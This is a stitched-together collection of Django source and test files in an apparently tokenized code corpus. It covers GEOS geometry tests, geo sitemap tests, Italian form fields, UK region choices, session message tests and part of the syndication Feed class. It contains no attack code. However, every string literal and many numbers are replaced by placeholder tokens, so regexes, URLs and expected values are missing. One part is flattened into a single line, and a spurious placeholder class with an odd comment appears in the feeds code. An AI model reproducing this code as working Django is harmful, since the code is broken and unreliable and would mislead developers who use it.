buffer , width , float ( quadsegs ) ) <EOL> buf = g . buffer ( width , quadsegs ) <EOL> self . assertEqual ( exp_buf . num_coords , buf . num_coords ) <EOL> self . assertEqual ( len ( exp_buf ) , len ( buf ) ) <EOL> for j in xrange ( len ( exp_buf ) ) : <EOL> exp_ring = exp_buf [ j ] <EOL> buf_ring = buf [ j ] <EOL> self . assertEqual ( len ( exp_ring ) , len ( buf_ring ) ) <EOL> for k in xrange ( len ( exp_ring ) ) : <EOL> self . assertAlmostEqual ( exp_ring [ k ] [ <NUM_LIT:0> ] , buf_ring [ k ] [ <NUM_LIT:0> ] , <NUM_LIT:9> ) <EOL> self . assertAlmostEqual ( exp_ring [ k ] [ <NUM_LIT:1> ] , buf_ring [ k ] [ <NUM_LIT:1> ] , <NUM_LIT:9> ) <EOL> def test15_srid ( self ) : <EOL> "<STR_LIT>" <EOL> pnt = Point ( <NUM_LIT:5> , <NUM_LIT> , srid = <NUM_LIT> ) <EOL> self . assertEqual ( <NUM_LIT> , pnt . srid ) <EOL> pnt . srid = <NUM_LIT> <EOL> self . assertEqual ( <NUM_LIT> , pnt . srid ) <EOL> self . assertRaises ( ctypes . ArgumentError , pnt . set_srid , '<STR_LIT>' ) <EOL> poly = fromstr ( self . geometries . polygons [ <NUM_LIT:1> ] . wkt , srid = <NUM_LIT> ) <EOL> self . assertEqual ( <NUM_LIT> , poly . srid ) <EOL> for ring in poly : self . assertEqual ( <NUM_LIT> , ring . srid ) <EOL> poly . srid = <NUM_LIT> <EOL> self . assertEqual ( <NUM_LIT> , poly . shell . srid ) <EOL> gc = GeometryCollection ( Point ( <NUM_LIT:5> , <NUM_LIT> ) , LineString ( ( <NUM_LIT:0> , <NUM_LIT:0> ) , ( <NUM_LIT> , <NUM_LIT> ) , ( <NUM_LIT:3> , <NUM_LIT:3> ) ) , srid = <NUM_LIT> ) <EOL> self . assertEqual ( <NUM_LIT> , gc . srid ) <EOL> for i in range ( len ( gc ) ) : self . assertEqual ( <NUM_LIT> , gc [ i ] . srid ) <EOL> hex = '<STR_LIT>' <EOL> p1 = fromstr ( hex ) <EOL> self . assertEqual ( <NUM_LIT> , p1 . srid ) <EOL> exp_srid = self . null_srid <EOL> p2 = fromstr ( p1 . hex ) <EOL> self . assertEqual ( exp_srid , p2 . srid ) <EOL> p3 = fromstr ( p1 . hex , srid = - <NUM_LIT:1> ) <EOL> self . assertEqual ( - <NUM_LIT:1> , p3 . 
srid ) <EOL> def test16_mutable_geometries ( self ) : <EOL> "<STR_LIT>" <EOL> for p in self . geometries . polygons : <EOL> poly = fromstr ( p . wkt ) <EOL> self . assertRaises ( TypeError , poly . __setitem__ , <NUM_LIT:0> , LineString ( ( <NUM_LIT:1> , <NUM_LIT:1> ) , ( <NUM_LIT:2> , <NUM_LIT:2> ) ) ) <EOL> shell_tup = poly . shell . tuple <EOL> new_coords = [ ] <EOL> for point in shell_tup : new_coords . append ( ( point [ <NUM_LIT:0> ] + <NUM_LIT> , point [ <NUM_LIT:1> ] + <NUM_LIT> ) ) <EOL> new_shell = LinearRing ( * tuple ( new_coords ) ) <EOL> poly . exterior_ring = new_shell <EOL> s = str ( new_shell ) <EOL> self . assertEqual ( poly . exterior_ring , new_shell ) <EOL> self . assertEqual ( poly [ <NUM_LIT:0> ] , new_shell ) <EOL> for tg in self . geometries . multipoints : <EOL> mp = fromstr ( tg . wkt ) <EOL> for i in range ( len ( mp ) ) : <EOL> pnt = mp [ i ] <EOL> new = Point ( random . randint ( <NUM_LIT:1> , <NUM_LIT:100> ) , random . randint ( <NUM_LIT:1> , <NUM_LIT:100> ) ) <EOL> mp [ i ] = new <EOL> s = str ( new ) <EOL> self . assertEqual ( mp [ i ] , new ) <EOL> self . assertEqual ( mp [ i ] . wkt , new . wkt ) <EOL> self . assertNotEqual ( pnt , mp [ i ] ) <EOL> for tg in self . geometries . multipolygons : <EOL> mpoly = fromstr ( tg . wkt ) <EOL> for i in xrange ( len ( mpoly ) ) : <EOL> poly = mpoly [ i ] <EOL> old_poly = mpoly [ i ] <EOL> for j in xrange ( len ( poly ) ) : <EOL> r = poly [ j ] <EOL> for k in xrange ( len ( r ) ) : r [ k ] = ( r [ k ] [ <NUM_LIT:0> ] + <NUM_LIT> , r [ k ] [ <NUM_LIT:1> ] + <NUM_LIT> ) <EOL> poly [ j ] = r <EOL> self . assertNotEqual ( mpoly [ i ] , poly ) <EOL> mpoly [ i ] = poly <EOL> s = str ( poly ) <EOL> self . assertEqual ( mpoly [ i ] , poly ) <EOL> self . assertNotEqual ( mpoly [ i ] , old_poly ) <EOL> def test17_threed ( self ) : <EOL> "<STR_LIT>" <EOL> pnt = Point ( <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:8> ) <EOL> self . assertEqual ( ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , pnt . coords ) <EOL> self . 
assertRaises ( TypeError , pnt . set_coords , ( <NUM_LIT:1.> , <NUM_LIT> ) ) <EOL> pnt . coords = ( <NUM_LIT:1.> , <NUM_LIT> , <NUM_LIT> ) <EOL> self . assertEqual ( ( <NUM_LIT:1.> , <NUM_LIT> , <NUM_LIT> ) , pnt . coords ) <EOL> ls = LineString ( ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , ( <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> ) ) <EOL> self . assertEqual ( ( ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , ( <NUM_LIT> , <NUM_LIT> , - <NUM_LIT> ) ) , ls . tuple ) <EOL> self . assertRaises ( TypeError , ls . __setitem__ , <NUM_LIT:0> , ( <NUM_LIT:1.> , <NUM_LIT> ) ) <EOL> ls [ <NUM_LIT:0> ] = ( <NUM_LIT:1.> , <NUM_LIT> , <NUM_LIT> ) <EOL> self . assertEqual ( ( <NUM_LIT:1.> , <NUM_LIT> , <NUM_LIT> ) , ls [ <NUM_LIT:0> ] ) <EOL> def test18_distance ( self ) : <EOL> "<STR_LIT>" <EOL> pnt = Point ( <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> self . assertEqual ( <NUM_LIT:0.0> , pnt . distance ( Point ( <NUM_LIT:0> , <NUM_LIT:0> ) ) ) <EOL> self . assertEqual ( <NUM_LIT:1.0> , pnt . distance ( Point ( <NUM_LIT:0> , <NUM_LIT:1> ) ) ) <EOL> self . assertAlmostEqual ( <NUM_LIT> , pnt . distance ( Point ( <NUM_LIT:1> , <NUM_LIT:1> ) ) , <NUM_LIT:11> ) <EOL> ls1 = LineString ( ( <NUM_LIT:0> , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , ( <NUM_LIT:2> , <NUM_LIT:2> ) ) <EOL> ls2 = LineString ( ( <NUM_LIT:5> , <NUM_LIT:2> ) , ( <NUM_LIT:6> , <NUM_LIT:1> ) , ( <NUM_LIT:7> , <NUM_LIT:0> ) ) <EOL> self . assertEqual ( <NUM_LIT:3> , ls1 . distance ( ls2 ) ) <EOL> def test19_length ( self ) : <EOL> "<STR_LIT>" <EOL> pnt = Point ( <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> self . assertEqual ( <NUM_LIT:0.0> , pnt . length ) <EOL> ls = LineString ( ( <NUM_LIT:0> , <NUM_LIT:0> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) ) <EOL> self . assertAlmostEqual ( <NUM_LIT> , ls . length , <NUM_LIT:11> ) <EOL> poly = Polygon ( LinearRing ( ( <NUM_LIT:0> , <NUM_LIT:0> ) , ( <NUM_LIT:0> , <NUM_LIT:1> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , ( <NUM_LIT:1> , <NUM_LIT:0> ) , ( <NUM_LIT:0> , <NUM_LIT:0> ) ) ) <EOL> self . 
assertEqual ( <NUM_LIT> , poly . length ) <EOL> mpoly = MultiPolygon ( poly . clone ( ) , poly ) <EOL> self . assertEqual ( <NUM_LIT> , mpoly . length ) <EOL> def test20a_emptyCollections ( self ) : <EOL> "<STR_LIT>" <EOL> gc1 = GeometryCollection ( [ ] ) <EOL> gc2 = fromstr ( '<STR_LIT>' ) <EOL> pnt = fromstr ( '<STR_LIT>' ) <EOL> ls = fromstr ( '<STR_LIT>' ) <EOL> poly = fromstr ( '<STR_LIT>' ) <EOL> mls = fromstr ( '<STR_LIT>' ) <EOL> mpoly1 = fromstr ( '<STR_LIT>' ) <EOL> mpoly2 = MultiPolygon ( ( ) ) <EOL> for g in [ gc1 , gc2 , pnt , ls , poly , mls , mpoly1 , mpoly2 ] : <EOL> self . assertEqual ( True , g . empty ) <EOL> if isinstance ( g , Polygon ) : <EOL> self . assertEqual ( <NUM_LIT:1> , len ( g ) ) <EOL> self . assertEqual ( <NUM_LIT:1> , g . num_geom ) <EOL> self . assertEqual ( <NUM_LIT:0> , len ( g [ <NUM_LIT:0> ] ) ) <EOL> elif isinstance ( g , ( Point , LineString ) ) : <EOL> self . assertEqual ( <NUM_LIT:1> , g . num_geom ) <EOL> self . assertEqual ( <NUM_LIT:0> , len ( g ) ) <EOL> else : <EOL> self . assertEqual ( <NUM_LIT:0> , g . num_geom ) <EOL> self . assertEqual ( <NUM_LIT:0> , len ( g ) ) <EOL> if isinstance ( g , Point ) : <EOL> self . assertRaises ( GEOSIndexError , g . get_x ) <EOL> elif isinstance ( g , Polygon ) : <EOL> lr = g . shell <EOL> self . assertEqual ( '<STR_LIT>' , lr . wkt ) <EOL> self . assertEqual ( <NUM_LIT:0> , len ( lr ) ) <EOL> self . assertEqual ( True , lr . empty ) <EOL> self . assertRaises ( GEOSIndexError , lr . __getitem__ , <NUM_LIT:0> ) <EOL> else : <EOL> self . assertRaises ( GEOSIndexError , g . __getitem__ , <NUM_LIT:0> ) <EOL> def test20b_collections_of_collections ( self ) : <EOL> "<STR_LIT>" <EOL> coll = [ mp . wkt for mp in self . geometries . multipolygons if mp . valid ] <EOL> coll . extend ( [ mls . wkt for mls in self . geometries . multilinestrings ] ) <EOL> coll . extend ( [ p . wkt for p in self . geometries . polygons ] ) <EOL> coll . extend ( [ mp . wkt for mp in self . geometries . 
multipoints ] ) <EOL> gc_wkt = '<STR_LIT>' % '<STR_LIT:U+002C>' . join ( coll ) <EOL> gc1 = GEOSGeometry ( gc_wkt ) <EOL> gc2 = GeometryCollection ( * tuple ( g for g in gc1 ) ) <EOL> self . assertEqual ( gc1 , gc2 ) <EOL> def test21_test_gdal ( self ) : <EOL> "<STR_LIT>" <EOL> if not gdal . HAS_GDAL : return <EOL> g1 = fromstr ( '<STR_LIT>' ) <EOL> self . assertEqual ( True , isinstance ( g1 . ogr , gdal . OGRGeometry ) ) <EOL> self . assertEqual ( g1 . srs , None ) <EOL> g2 = fromstr ( '<STR_LIT>' , srid = <NUM_LIT> ) <EOL> self . assertEqual ( True , isinstance ( g2 . ogr , gdal . OGRGeometry ) ) <EOL> self . assertEqual ( True , isinstance ( g2 . srs , gdal . SpatialReference ) ) <EOL> self . assertEqual ( g2 . hex , g2 . ogr . hex ) <EOL> self . assertEqual ( '<STR_LIT>' , g2 . srs . name ) <EOL> def test22_copy ( self ) : <EOL> "<STR_LIT>" <EOL> import django . utils . copycompat as copy <EOL> poly = GEOSGeometry ( '<STR_LIT>' ) <EOL> cpy1 = copy . copy ( poly ) <EOL> cpy2 = copy . deepcopy ( poly ) <EOL> self . assertNotEqual ( poly . _ptr , cpy1 . _ptr ) <EOL> self . assertNotEqual ( poly . _ptr , cpy2 . _ptr ) <EOL> def test23_transform ( self ) : <EOL> "<STR_LIT>" <EOL> if not gdal . HAS_GDAL : return <EOL> orig = GEOSGeometry ( '<STR_LIT>' , <NUM_LIT> ) <EOL> trans = GEOSGeometry ( '<STR_LIT>' , <NUM_LIT> ) <EOL> t1 , t2 , t3 = orig . clone ( ) , orig . clone ( ) , orig . clone ( ) <EOL> t1 . transform ( trans . srid ) <EOL> t2 . transform ( gdal . SpatialReference ( '<STR_LIT>' ) ) <EOL> ct = gdal . CoordTransform ( gdal . SpatialReference ( '<STR_LIT>' ) , gdal . SpatialReference ( <NUM_LIT> ) ) <EOL> t3 . transform ( ct ) <EOL> k1 = orig . clone ( ) <EOL> k2 = k1 . transform ( trans . srid , clone = True ) <EOL> self . assertEqual ( k1 , orig ) <EOL> self . assertNotEqual ( k1 , k2 ) <EOL> prec = <NUM_LIT:3> <EOL> for p in ( t1 , t2 , t3 , k2 ) : <EOL> self . assertAlmostEqual ( trans . x , p . x , prec ) <EOL> self . assertAlmostEqual ( trans . 
y , p . y , prec ) <EOL> def test24_extent ( self ) : <EOL> "<STR_LIT>" <EOL> mp = MultiPoint ( Point ( <NUM_LIT:5> , <NUM_LIT> ) , Point ( <NUM_LIT:0> , <NUM_LIT:0> ) , Point ( <NUM_LIT:10> , <NUM_LIT:50> ) ) <EOL> self . assertEqual ( ( <NUM_LIT:0.0> , <NUM_LIT:0.0> , <NUM_LIT> , <NUM_LIT> ) , mp . extent ) <EOL> pnt = Point ( <NUM_LIT> , <NUM_LIT> ) <EOL> self . assertEqual ( ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , pnt . extent ) <EOL> poly = fromstr ( self . geometries . polygons [ <NUM_LIT:3> ] . wkt ) <EOL> ring = poly . shell <EOL> x , y = ring . x , ring . y <EOL> xmin , ymin = min ( x ) , min ( y ) <EOL> xmax , ymax = max ( x ) , max ( y ) <EOL> self . assertEqual ( ( xmin , ymin , xmax , ymax ) , poly . extent ) <EOL> def test25_pickle ( self ) : <EOL> "<STR_LIT>" <EOL> import pickle , cPickle <EOL> def get_geoms ( lst , srid = None ) : <EOL> return [ GEOSGeometry ( tg . wkt , srid ) for tg in lst ] <EOL> tgeoms = get_geoms ( self . geometries . points ) <EOL> tgeoms . extend ( get_geoms ( self . geometries . multilinestrings , <NUM_LIT> ) ) <EOL> tgeoms . extend ( get_geoms ( self . geometries . polygons , <NUM_LIT> ) ) <EOL> tgeoms . extend ( get_geoms ( self . geometries . multipolygons , <NUM_LIT> ) ) <EOL> no_srid = self . null_srid == - <NUM_LIT:1> <EOL> for geom in tgeoms : <EOL> s1 , s2 = cPickle . dumps ( geom ) , pickle . dumps ( geom ) <EOL> g1 , g2 = cPickle . loads ( s1 ) , pickle . loads ( s2 ) <EOL> for tmpg in ( g1 , g2 ) : <EOL> self . assertEqual ( geom , tmpg ) <EOL> if not no_srid : self . assertEqual ( geom . srid , tmpg . srid ) <EOL> def test26_prepared ( self ) : <EOL> "<STR_LIT>" <EOL> if not GEOS_PREPARE : return <EOL> mpoly = GEOSGeometry ( '<STR_LIT>' ) <EOL> prep = mpoly . prepared <EOL> pnts = [ Point ( <NUM_LIT:5> , <NUM_LIT:5> ) , Point ( <NUM_LIT> , <NUM_LIT> ) , Point ( <NUM_LIT> , <NUM_LIT> ) ] <EOL> covers = [ True , True , False ] <EOL> for pnt , c in zip ( pnts , covers ) : <EOL> self . 
assertEqual ( mpoly . contains ( pnt ) , prep . contains ( pnt ) ) <EOL> self . assertEqual ( mpoly . intersects ( pnt ) , prep . intersects ( pnt ) ) <EOL> self . assertEqual ( c , prep . covers ( pnt ) ) <EOL> def test26_line_merge ( self ) : <EOL> "<STR_LIT>" <EOL> ref_geoms = ( fromstr ( '<STR_LIT>' ) , <EOL> fromstr ( '<STR_LIT>' ) , <EOL> ) <EOL> ref_merged = ( fromstr ( '<STR_LIT>' ) , <EOL> fromstr ( '<STR_LIT>' ) , <EOL> ) <EOL> for geom , merged in zip ( ref_geoms , ref_merged ) : <EOL> self . assertEqual ( merged , geom . merged ) <EOL> def suite ( ) : <EOL> s = unittest . TestSuite ( ) <EOL> s . addTest ( unittest . makeSuite ( GEOSTest ) ) <EOL> return s <EOL> def run ( verbosity = <NUM_LIT:2> ) : <EOL> unittest . TextTestRunner ( verbosity = verbosity ) . run ( suite ( ) ) </s>
import cStringIO
from xml.dom import minidom
import zipfile

from django.test import TestCase

from models import City, Country


class GeoSitemapTest(TestCase):
    """Tests for the geo-aware sitemap framework (index, KML/KMZ, GeoRSS)."""

    # URLconf module the test client uses for these requests.
    urls = '<STR_LIT>'

    def assertChildNodes(self, elem, expected):
        """Assert that the set of *elem*'s child node names equals *expected* (order-insensitive)."""
        actual = set([n.nodeName for n in elem.childNodes])
        expected = set(expected)
        self.assertEqual(actual, expected)

    def test_geositemap_index(self):
        """The sitemap index parses, carries the expected attribute, and lists 3 entries."""
        doc = minidom.parseString(self.client.get('<STR_LIT>').content)
        index = doc.firstChild
        self.assertEqual(index.getAttribute(u'<STR_LIT>'), u'<STR_LIT>')
        self.assertEqual(3, len(index.getElementsByTagName('<STR_LIT>')))

    def test_geositemap_kml(self):
        """Each KML-type sitemap URL points at a fetchable document with one element per model object."""
        for kml_type in ('<STR_LIT>', '<STR_LIT>'):
            doc = minidom.parseString(self.client.get('<STR_LIT>' % kml_type).content)
            urlset = doc.firstChild
            # Root element must carry both expected attributes.
            self.assertEqual(urlset.getAttribute(u'<STR_LIT>'), u'<STR_LIT>')
            self.assertEqual(urlset.getAttribute(u'<STR_LIT>'), u'<STR_LIT>')
            urls = urlset.getElementsByTagName('<STR_LIT:url>')
            self.assertEqual(2, len(urls))
            for url in urls:
                self.assertChildNodes(url, ['<STR_LIT>', '<STR_LIT>'])
                geo_elem = url.getElementsByTagName('<STR_LIT>')[0]
                geo_format = geo_elem.getElementsByTagName('<STR_LIT>')[0]
                # The advertised format must match the sitemap flavor requested.
                self.assertEqual(kml_type, geo_format.childNodes[0].data)
                kml_url = url.getElementsByTagName('<STR_LIT>')[0].childNodes[0].data.split('<STR_LIT>')[1]
                # NOTE(review): kml_doc (and model, below) are only bound inside
                # if/elif branches — if neither branch matches, the assertions
                # below would raise NameError rather than a test failure.
                if kml_type == '<STR_LIT>':
                    kml_doc = minidom.parseString(self.client.get(kml_url).content)
                elif kml_type == '<STR_LIT>':
                    # KMZ flavor: response body is a one-entry zip archive
                    # containing the KML document.
                    buf = cStringIO.StringIO(self.client.get(kml_url).content)
                    zf = zipfile.ZipFile(buf)
                    self.assertEqual(1, len(zf.filelist))
                    self.assertEqual('<STR_LIT>', zf.filelist[0].filename)
                    kml_doc = minidom.parseString(zf.read('<STR_LIT>'))
                if '<STR_LIT>' in kml_url:
                    model = City
                elif '<STR_LIT>' in kml_url:
                    model = Country
                # One KML element per object of the referenced model.
                self.assertEqual(model.objects.count(), len(kml_doc.getElementsByTagName('<STR_LIT>')))

    def test_geositemap_georss(self):
        """The GeoRSS sitemap lists one <url> per registered feed, each flagged with the GeoRSS format."""
        from feeds import feed_dict
        doc = minidom.parseString(self.client.get('<STR_LIT>').content)
        urlset = doc.firstChild
        self.assertEqual(urlset.getAttribute(u'<STR_LIT>'), u'<STR_LIT>')
        self.assertEqual(urlset.getAttribute(u'<STR_LIT>'), u'<STR_LIT>')
        urls = urlset.getElementsByTagName('<STR_LIT:url>')
        self.assertEqual(len(feed_dict), len(urls))
        for url in urls:
            self.assertChildNodes(url, ['<STR_LIT>', '<STR_LIT>'])
            geo_elem = url.getElementsByTagName('<STR_LIT>')[0]
            geo_format = geo_elem.getElementsByTagName('<STR_LIT>')[0]
            self.assertEqual('<STR_LIT>', geo_format.childNodes[0].data)
"""<STR_LIT>"""
import re

from django.core.validators import EMPTY_VALUES
from django.forms import ValidationError
from django.forms.fields import Field, RegexField, Select
from django.utils.translation import ugettext_lazy as _
from django.utils.encoding import smart_unicode
from django.contrib.localflavor.it.util import ssn_check_digit, vat_number_check_digit


class ITZipCodeField(RegexField):
    """Regex-validated field for an Italian ZIP code."""
    default_error_messages = {
        '<STR_LIT>': _('<STR_LIT>'),
    }

    def __init__(self, *args, **kwargs):
        super(ITZipCodeField, self).__init__(r'<STR_LIT>',
            max_length=None, min_length=None, *args, **kwargs)


class ITRegionSelect(Select):
    """Select widget whose choices are the Italian regions."""

    def __init__(self, attrs=None):
        from it_region import REGION_CHOICES
        super(ITRegionSelect, self).__init__(attrs, choices=REGION_CHOICES)


class ITProvinceSelect(Select):
    """Select widget whose choices are the Italian provinces."""

    def __init__(self, attrs=None):
        from it_province import PROVINCE_CHOICES
        super(ITProvinceSelect, self).__init__(attrs, choices=PROVINCE_CHOICES)


class ITSocialSecurityNumberField(RegexField):
    """Field validating an Italian social security number via its check digit."""
    default_error_messages = {
        '<STR_LIT>': _(u'<STR_LIT>'),
    }

    def __init__(self, *args, **kwargs):
        super(ITSocialSecurityNumberField, self).__init__(r'<STR_LIT>',
            max_length=None, min_length=None, *args, **kwargs)

    def clean(self, value):
        value = super(ITSocialSecurityNumberField, self).clean(value)
        if value in EMPTY_VALUES:
            return u'<STR_LIT>'
        # Normalize before recomputing the check digit.
        normalized = re.sub('<STR_LIT>', u'<STR_LIT>', value).upper()
        try:
            expected = ssn_check_digit(normalized)
        except ValueError:
            raise ValidationError(self.error_messages['<STR_LIT>'])
        # The 16th character must be the recomputed check digit.
        if normalized[15] != expected:
            raise ValidationError(self.error_messages['<STR_LIT>'])
        return normalized


class ITVatNumberField(Field):
    """Field validating an Italian VAT number via its check digit."""
    default_error_messages = {
        '<STR_LIT>': _(u'<STR_LIT>'),
    }

    def clean(self, value):
        value = super(ITVatNumberField, self).clean(value)
        if value in EMPTY_VALUES:
            return u'<STR_LIT>'
        try:
            numeric = int(value)
        except ValueError:
            raise ValidationError(self.error_messages['<STR_LIT>'])
        # Left-pad to the canonical 11-digit form.
        padded = str(numeric).zfill(11)
        expected = vat_number_check_digit(padded[:10])
        if padded[10] != expected:
            raise ValidationError(self.error_messages['<STR_LIT>'])
        return smart_unicode(padded)
"""<STR_LIT>"""
from django.utils.translation import ugettext_lazy as _

# Choice tuples of (value, lazily-translated label) for UK sub-regions.
# Labels are wrapped in ugettext_lazy so translation happens at render time.
ENGLAND_REGION_CHOICES = (
    ("<STR_LIT>", _("<STR_LIT>")),
    ("<STR_LIT>", _("<STR_LIT>")),
    # BUGFIX: this entry was missing the _() wrapper, so its label was a plain
    # (untranslatable) string while every other label is lazily translated.
    ("<STR_LIT>", _("<STR_LIT>")),
    ("<STR_LIT>", _("<STR_LIT>")),
    ("<STR_LIT>", _("<STR_LIT>")),
    ("<STR_LIT>", _("<STR_LIT>")),
    ("<STR_LIT>", _("<STR_LIT>")),
    ("<STR_LIT>", _("<STR_LIT>")),
    ("<STR_LIT>", _("<STR_LIT>")),
    ("<STR_LIT>", _("<STR_LIT>")),
    ("<STR_LIT>", _("<STR_LIT>")),
    ("<STR_LIT>", _("<STR_LIT>")),
    ("<STR_LIT>", _("<STR_LIT>")),
    ("<STR_LIT>", _("<STR_LIT>")),
    ("<STR_LIT>", _("<STR_LIT>")),
    ("<STR_LIT>", _("<STR_LIT>")),
    ("<STR_LIT>", _("<STR_LIT>")),
    ("<STR_LIT>", _("<STR_LIT>")),
    ("<STR_LIT>", _("<STR_LIT>")),
    ("<STR_LIT>", _("<STR_LIT>")),
    ("<STR_LIT>", _("<STR_LIT>")),
    ("<STR_LIT>", _("<STR_LIT>")),
    ("<STR_LIT>", _("<STR_LIT>")),
    ("<STR_LIT>", _("<STR_LIT>")),
    ("<STR_LIT>", _("<STR_LIT>")),
    ("<STR_LIT>", _("<STR_LIT>")),
    ("<STR_LIT>", _("<STR_LIT>")),
    ("<STR_LIT>", _("<STR_LIT>")),
    ("<STR_LIT>", _("<STR_LIT>")),
    ("<STR_LIT>", _("<STR_LIT>")),
    ("<STR_LIT>", _("<STR_LIT>")),
    ("<STR_LIT>", _("<STR_LIT>")),
    ("<STR_LIT>", _("<STR_LIT>")),
    ("<STR_LIT>", _("<STR_LIT>")),
    ("<STR_LIT>", _("<STR_LIT>")),
    ("<STR_LIT>", _("<STR_LIT>")),
    ("<STR_LIT>", _("<STR_LIT>")),
    ("<STR_LIT>", _("<STR_LIT>")),
    ("<STR_LIT>", _("<STR_LIT>")),
    ("<STR_LIT>", _("<STR_LIT>")),
    ("<STR_LIT>", _("<STR_LIT>")),
)

NORTHERN_IRELAND_REGION_CHOICES = (
    ("<STR_LIT>", _("<STR_LIT>")),
    ("<STR_LIT>", _("<STR_LIT>")),
    ("<STR_LIT>", _("<STR_LIT>")),
    ("<STR_LIT>", _("<STR_LIT>")),
    ("<STR_LIT>", _("<STR_LIT>")),
    ("<STR_LIT>", _("<STR_LIT>")),
)

WALES_REGION_CHOICES = (
    ("<STR_LIT>", _("<STR_LIT>")),
    ("<STR_LIT>", _("<STR_LIT>")),
    ("<STR_LIT>", _("<STR_LIT>")),
    ("<STR_LIT>", _("<STR_LIT>")),
    ("<STR_LIT>", _("<STR_LIT>")),
    ("<STR_LIT>", _("<STR_LIT>")),
    ("<STR_LIT>", _("<STR_LIT>")),
    ("<STR_LIT>", _("<STR_LIT>")),
)

SCOTTISH_REGION_CHOICES = (
    ("<STR_LIT>", _("<STR_LIT>")),
    ("<STR_LIT>", _("<STR_LIT>")),
    ("<STR_LIT>", _("<STR_LIT>")),
    ("<STR_LIT>", _("<STR_LIT>")),
    ("<STR_LIT>", _("<STR_LIT>")),
    ("<STR_LIT>", _("<STR_LIT>")),
    ("<STR_LIT>", _("<STR_LIT>")),
    ("<STR_LIT>", _("<STR_LIT>")),
    ("<STR_LIT>", _("<STR_LIT>")),
    ("<STR_LIT>", _("<STR_LIT>")),
    ("<STR_LIT>", _("<STR_LIT>")),
    ("<STR_LIT>", _("<STR_LIT>")),
)

UK_NATIONS_CHOICES = (
    ("<STR_LIT>", _("<STR_LIT>")),
    ("<STR_LIT>", _("<STR_LIT>")),
    ("<STR_LIT>", _("<STR_LIT>")),
    ("<STR_LIT>", _("<STR_LIT>")),
)

# Flat union of all sub-region choice lists.
UK_REGION_CHOICES = ENGLAND_REGION_CHOICES + NORTHERN_IRELAND_REGION_CHOICES + WALES_REGION_CHOICES + SCOTTISH_REGION_CHOICES
from django.contrib.messages.tests.base import BaseTest
from django.contrib.messages.storage.session import SessionStorage


def set_session_data(storage, messages):
    """Store *messages* directly in the storage's session and drop any cached load."""
    storage.request.session[storage.session_key] = messages
    if hasattr(storage, '<STR_LIT>'):
        # Invalidate the lazily-loaded cache so the new data is re-read.
        del storage._loaded_data


def stored_session_messages_count(storage):
    """Return how many messages are currently persisted in the session."""
    return len(storage.request.session.get(storage.session_key, []))


class SessionTest(BaseTest):
    """Run the shared messages test suite against session-backed storage."""
    storage_class = SessionStorage

    def get_request(self):
        # Attach a plain dict as the session for the base request.
        self.session = {}
        request = super(SessionTest, self).get_request()
        request.session = self.session
        return request

    def stored_messages_count(self, storage, response):
        return stored_session_messages_count(storage)

    def test_get(self):
        storage = self.storage_class(self.get_request())
        sample = ['<STR_LIT:test>', '<STR_LIT>']
        set_session_data(storage, sample)
        self.assertEqual(list(storage), sample)
import datetime

from django.conf import settings
from django.contrib.sites.models import get_current_site
from django.core.exceptions import ImproperlyConfigured, ObjectDoesNotExist
from django.http import HttpResponse, Http404
from django.template import loader, Template, TemplateDoesNotExist, RequestContext
from django.utils import feedgenerator, tzinfo
from django.utils.encoding import force_unicode, iri_to_uri, smart_unicode
from django.utils.html import escape


def add_domain(domain, url, secure=False):
    # Prefix *url* with scheme + *domain* unless it already starts with one of
    # the three recognized absolute prefixes.
    if not (url.startswith('<STR_LIT>')
            or url.startswith('<STR_LIT>')
            or url.startswith('<STR_LIT>')):
        if secure:
            protocol = '<STR_LIT>'
        else:
            protocol = '<STR_LIT:http>'
        url = iri_to_uri(u'<STR_LIT>' % (protocol, domain, url))
    return url


class FieldDoesNotExist_placeholder:  # (not present; see classes below)
    pass


class FeedDoesNotExist(ObjectDoesNotExist):
    pass


class Feed(object):
    """Class-based syndication feed: subclasses override attributes/methods,
    and __call__ renders the generated feed as an HTTP response."""
    feed_type = feedgenerator.DefaultFeed
    title_template = None
    description_template = None

    def __call__(self, request, *args, **kwargs):
        try:
            obj = self.get_object(request, *args, **kwargs)
        except ObjectDoesNotExist:
            raise Http404('<STR_LIT>')
        feedgen = self.get_feed(obj, request)
        response = HttpResponse(mimetype=feedgen.mime_type)
        feedgen.write(response, '<STR_LIT:utf-8>')
        return response

    def item_title(self, item):
        # Default title: HTML-escaped unicode form of the item.
        return escape(force_unicode(item))

    def item_description(self, item):
        return force_unicode(item)

    def item_link(self, item):
        try:
            return item.get_absolute_url()
        except AttributeError:
            raise ImproperlyConfigured('<STR_LIT>' % item.__class__.__name__)

    def __get_dynamic_attr(self, attname, obj, default=None):
        # Resolve *attname* on self; if it's callable, decide via Python-2
        # func_code.co_argcount whether it takes (self, obj) or just (self).
        try:
            attr = getattr(self, attname)
        except AttributeError:
            return default
        if callable(attr):
            if hasattr(attr, '<STR_LIT>'):
                argcount = attr.func_code.co_argcount
            else:
                argcount = attr.__call__.func_code.co_argcount
            if argcount == 2:
                return attr(obj)
            else:
                return attr()
        return attr

    def feed_extra_kwargs(self, obj):
        """Extra kwargs passed to the feed-type constructor (hook for subclasses)."""
        return {}

    def item_extra_kwargs(self, item):
        """Extra kwargs passed to feed.add_item() per item (hook for subclasses)."""
        return {}

    def get_object(self, request, *args, **kwargs):
        return None

    def get_feed(self, obj, request):
        """Build and return the feedgenerator feed object for *obj*."""
        current_site = get_current_site(request)
        link = self.__get_dynamic_attr('<STR_LIT>', obj)
        link = add_domain(current_site.domain, link, request.is_secure())
        feed = self.feed_type(
            title=self.__get_dynamic_attr('<STR_LIT:title>', obj),
            subtitle=self.__get_dynamic_attr('<STR_LIT>', obj),
            link=link,
            description=self.__get_dynamic_attr('<STR_LIT:description>', obj),
            language=settings.LANGUAGE_CODE.decode(),
            feed_url=add_domain(
                current_site.domain,
                self.__get_dynamic_attr('<STR_LIT>', obj) or request.path,
                request.is_secure(),
            ),
            author_name=self.__get_dynamic_attr('<STR_LIT>', obj),
